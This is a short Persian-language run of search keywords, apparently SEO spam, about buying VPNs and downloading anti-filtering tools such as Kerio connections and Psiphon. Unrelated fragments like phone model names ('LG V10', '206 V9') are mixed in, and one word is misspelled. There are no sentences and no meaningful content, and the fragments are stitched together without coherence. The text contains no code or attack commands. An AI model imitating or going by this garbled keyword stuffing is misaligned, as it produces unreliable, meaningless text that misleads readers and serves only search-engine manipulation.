خرید vpn بدون نیاز به ایمیل kerio دانلوذ
لوس کانکشن خرید آنلاین فیلترشکن kerio
دانلود کانکشن کریو ویندوز 10 خرید vpn برای گوشی موبایل دانلود کریو 8.4.1
دانلود کانکشن هوشمند 20اسپید
خرید 206 وی 9 kerio سایت
خرید الجی وی 10 anti filter psiphon 5 free download